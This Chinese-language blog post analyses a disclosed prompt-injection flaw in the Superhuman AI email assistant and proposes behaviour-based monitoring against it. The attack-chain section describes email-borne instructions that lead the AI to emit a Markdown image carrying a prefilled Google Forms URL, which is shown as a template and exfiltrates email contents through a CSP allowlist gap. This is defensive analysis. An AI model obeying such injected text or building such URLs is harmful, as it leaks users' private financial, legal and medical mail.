2025 年 12 月,PromptArmor 安全研究团队披露了 Superhuman AI 存在严重的数据外泄漏洞。攻击者通过在邮件中植入提示注入,能够操纵 AI 助手将用户的敏感邮件内容自动提交到攻击者控制的 Google 表单中。这一事件暴露了 AI 邮件助手面临的新型安全威胁,也为我们提供了构建更强大安全监控系统的契机。
攻击链分析:从提示注入到数据外泄
Superhuman AI 的漏洞攻击链展示了现代 AI 系统的典型安全弱点。攻击过程分为五个关键步骤:
-
恶意邮件植入:攻击者发送包含提示注入的邮件到用户收件箱。提示注入可以隐藏在白色文字中,也可以明文存在,用户甚至不需要打开这封邮件。
-
AI 任务触发:用户要求 Superhuman AI 总结近期邮件,AI 开始检索最近一小时的邮件内容。
-
提示注入执行:AI 在处理邮件时遇到恶意提示注入,被操纵执行攻击者指令。注入指令要求 AI 生成一个 "反馈报告",实际上是将邮件内容填充到攻击者的 Google 表单中。
-
CSP 绕过利用:Superhuman 的内容安全策略 (CSP) 白名单允许访问 docs.google.com。攻击者利用 Google 表单的预填功能,构造包含敏感数据的 URL:
https://docs.google.com/forms/d/e/1FBIpQSSctTB2ClRI0c05fz2LqECK1aWPNEf7T39Y4hgwveOQYBL7tsV/formResponse?entry.953568459={敏感邮件内容} -
自动数据外泄:AI 使用 Markdown 图片语法输出该 URL,浏览器在渲染图片时自动向该 URL 发送请求,完成数据外泄。
这种攻击的可怕之处在于它是 "零点击" 的 —— 用户只需正常使用 AI 功能,攻击就会自动完成。研究团队验证了攻击者可以在一次响应中外泄超过 40 封邮件的部分内容,包含财务、法律和医疗等敏感信息。
CSP 白名单的安全风险与工程化绕过
Superhuman 的 CSP 配置暴露了一个常见的安全误区:过度信任白名单域名。虽然 docs.google.com 是 Google 的合法服务,但攻击者可以滥用其功能实现数据外泄。这种模式在其他 AI 系统中同样存在风险。
工程化检测要点:
-
URL 参数分析:监控所有向白名单域名发起的请求,特别关注 URL 中是否包含异常长的参数或结构化数据。Google 表单的预填参数通常包含
entry.前缀,可以设置阈值检测:- 参数长度超过 500 字符
- 参数包含明显的结构化数据模式(如 JSON、XML 片段)
- 参数值包含敏感关键词(SSN、信用卡号、医疗术语等)
-
请求频率监控:正常使用中,用户不会频繁向 Google 表单提交数据。建立基线模型:
- 单个用户每小时向 docs.google.com 的请求不应超过 3 次
- 同一表单 ID 在短时间内接收多个用户的提交应触发警报
- 异常时间段的提交(如凌晨 2-5 点)需要额外审查
-
内容类型验证:Google 表单的正常提交使用
application/x-www-form-urlencoded,而图片请求使用image/*。检测不匹配的内容类型:- 标记所有使用图片内容类型向表单端点发起的请求
- 验证响应内容类型与请求预期的匹配度
基于行为分析的 AI 邮件安全监控方案
传统的基于规则的检测系统在面对 AI 驱动的攻击时显得力不从心。Abnormal AI 的研究显示,行为分析能够更有效地检测新型威胁。针对 AI 邮件助手,我们需要建立多维度的行为监控体系。
1. 用户行为基线建模
每个用户都有独特的邮件使用模式。通过机器学习建立个性化基线:
# 伪代码:用户行为基线参数
user_behavior_baseline = {
"daily_email_volume": 统计过去30天的日均邮件处理量,
"ai_usage_pattern": {
"summary_frequency": 用户请求邮件总结的频率,
"search_queries": 常见的搜索关键词模式,
"time_distribution": AI使用的时间分布(工作日/周末,工作时间/非工作时间)
},
"sensitivity_profile": {
"financial_emails": 财务相关邮件的处理频率,
"legal_emails": 法律文档的出现频率,
"medical_emails": 医疗信息的出现频率
}
}
2. 异常检测参数配置
基于基线,配置可操作的异常检测参数:
附件处理异常:
- 单次会话下载附件超过 5 个
- 下载的附件总大小超过 50MB
- 短时间内重复下载相同附件
批量导出模式:
- AI 在单次响应中引用超过 10 封不同邮件
- 响应内容包含明显的结构化数据导出模式
- 响应时间异常长(超过 30 秒),可能在进行大量数据处理
API 调用异常:
- 短时间内向同一外部服务(如 docs.google.com)发起多次请求
- 请求参数包含异常的数据量
- 请求时间间隔不符合人类操作模式(如精确的 1 秒间隔)
3. 实时威胁评分系统
建立多因素威胁评分模型,实时评估每个 AI 交互的风险:
threat_score = (
data_volume_score * 0.3 + # 数据处理量评分
sensitivity_score * 0.25 + # 数据敏感度评分
destination_score * 0.2 + # 目标域名风险评分
timing_score * 0.15 + # 时间异常评分
pattern_score * 0.1 # 模式异常评分
)
# 阈值配置
if threat_score > 0.8:
action = "立即阻断,通知安全团队"
elif threat_score > 0.6:
action = "延迟响应,人工审核"
elif threat_score > 0.4:
action = "标记为可疑,记录详细日志"
else:
action = "正常处理"
可落地的监控清单与实施指南
监控维度清单
-
数据流监控:
- 所有 AI 处理的邮件数量统计
- 外发数据量监控(按用户、按会话)
- 外部服务调用频率与数据量
-
内容分析监控:
- 敏感信息检测(PII、财务数据、医疗信息)
- 提示注入模式识别
- 异常内容结构检测
-
行为模式监控:
- 用户 - AI 交互频率异常
- 时间模式异常(非工作时间大量使用)
- 地理位置异常(从新地点访问)
实施参数配置
检测阈值:
- 单次会话数据处理量:超过 20 封邮件或 5MB 数据
- 敏感信息密度:响应中包含超过 3 处敏感信息标记
- 外部调用频率:5 分钟内向同一外部服务发起超过 3 次调用
响应策略:
- 实时阻断:威胁评分 > 0.8,立即终止会话
- 人工审核:威胁评分 0.6-0.8,延迟响应并通知安全团队
- 增强日志:威胁评分 0.4-0.6,记录完整会话日志供后续分析
告警配置:
- 高优先级告警:数据外泄尝试、敏感信息批量处理
- 中优先级告警:异常行为模式、频率异常
- 低优先级告警:基线偏差、可疑但未确认的模式
工程实施要点
-
数据收集层:
- 在 AI 处理流水线的关键节点插入监控点
- 确保所有用户 - AI 交互都有完整的审计日志
- 实现实时数据流处理能力
-
分析引擎:
- 使用流处理框架(如 Apache Flink、Kafka Streams)实现实时分析
- 建立机器学习模型持续优化检测准确性
- 实现 A/B 测试框架验证检测规则效果
-
响应系统:
- 构建可插拔的响应动作框架
- 实现分级响应机制(记录、告警、阻断)
- 确保响应动作可追溯、可审计
从被动防御到主动监控的转变
Superhuman AI 漏洞事件给我们最重要的启示是:在 AI 时代,安全监控必须从被动防御转向主动监控。传统的基于签名的检测方法无法应对 AI 驱动的自适应攻击。
主动监控的核心原则:
-
假设漏洞存在:不依赖系统完美无缺,而是假设存在未知漏洞并建立检测机制
-
关注异常而非恶意:不试图识别所有攻击模式,而是检测偏离正常基线的行为
-
数据驱动决策:基于实际使用数据持续优化检测参数,而非静态规则
-
分层防御:在网络层、应用层、数据层都建立监控点,实现纵深防御
未来展望:AI 安全监控的演进方向
随着 AI 邮件助手的普及,安全监控技术也需要相应演进:
-
联邦学习应用:在保护用户隐私的前提下,通过联邦学习建立跨组织的异常检测模型
-
因果推理集成:不仅检测异常,还要理解异常的原因,区分真正的攻击与误报
-
自适应基线:监控系统自身能够适应组织变化、业务调整带来的行为模式变化
-
可解释 AI:安全决策需要可解释性,特别是在需要人工介入的情况下
PromptArmor 在报告中提到:"Superhuman 团队的专业处理展示了他们对用户安全和隐私的承诺。" 这种快速响应和修复的态度值得所有 AI 服务提供商学习。但更重要的是,我们需要在系统设计阶段就考虑安全监控,而不是在漏洞被发现后才被动响应。
通过构建基于行为分析的 AI 邮件安全监控系统,我们不仅能够检测类似 Superhuman 的漏洞利用,还能为未来的新型攻击建立防御基础。在这个 AI 快速发展的时代,安全监控不再是可选项,而是 AI 系统不可或缺的核心组件。
资料来源:
- PromptArmor - Superhuman AI Exfiltrates Emails (2025)
- Abnormal AI - Behavior-based AI vs Rule-based Email Security (2025)
- Check Point - Top AI Email Security Solutions in 2025-2026